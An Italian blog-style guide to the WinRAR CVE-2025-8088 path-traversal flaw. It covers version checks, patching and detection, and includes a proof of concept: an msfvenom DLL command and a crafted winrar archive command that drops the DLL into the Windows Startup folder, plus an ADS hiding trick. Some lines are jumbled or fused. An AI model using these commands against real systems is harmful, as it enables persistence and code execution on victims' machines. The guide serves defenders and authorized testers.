Una coinvolgente guida su come scoprire, correggere e proteggere WinRAR CVE-2025-8088 con un tocco pratico da hacker.
WinRAR — il classico polveroso che tutti hanno installato ma nessuno aggiorna — è stato appena colpito da un zero-day ad alta gravità: CVE-2025-8088.
La CISA ha addirittura inserito questo nel loro catalogo delle vulnerabilità note sfruttate, con una scadenza di correzione entro il 2 settembre 2025. Questa non è solo teoria — è fuoco vivo.
..\Startup\evil.dllAffetto: WinRAR per Windows (≤7.12), UnRAR.dll, Portable UnRAR Sicuri: Build Linux, Unix, Android.
Prima di farti prendere dal panico o fare l'hacker, controlla la tua versione.
Aiuto → Informazioni su WinRARwinget list WinRAR
(oppure esegui winrar.exe dalla sua directory di installazione)
UnRAR.dll → Proprietà → Dettagli.Quando ho iniziato a scrivere, ero su 7.10 — sì, maturo per la raccolta 🗿🐔🍗.
Aiuto → Informazioni su WinRAR → dovrebbe leggere 7.13 o superiore.UnRAR.dll negli strumenti dipendenti, se presenti.WinRAR non si aggiorna automaticamente — imposta un promemoria sul calendario, non diventare un bersaglio statico.
PS: Ignora la mia sfacciataggine sullo sfondo — dovevo farne un po' mostra! 😏
%TEMP% e nelle cartelle di avvio.⚠ Disclaimer: Questo è solo per test di sicurezza educativi e autorizzati. Non andare in modalità gremlin 🗿.
msfvenom -p windows/x64/exec CMD=calc.exe -f dll > evil.dll
winrar a -ep -ap"\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" payload.rar evil.dll
type evil.dll > legit.txt:evil.dll
Boom — evil.dll finisce in Startup. Al prossimo riavvio? Ciao calc.exe.
Patch → WinRAR 7.13+
Cerca file .dll o .lnk sospetti in:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup%TEMP%Monitora ADS:
streams.exe -s C:\
Regole IDS/IPS: segnala RAR con sequenze ..\.
Plugin Nessus/Qualys già disponibili.
Questa non era una vulnerabilità “forse-un-giorno” — è stata armata prima della divulgazione. Se sei ancora su 7.10 (come me quando scrivevo), fai il patch ora. Se fai parte del team red team, trattalo come un caso studio su come strumenti vecchi diventano nuovi vettori d'attacco.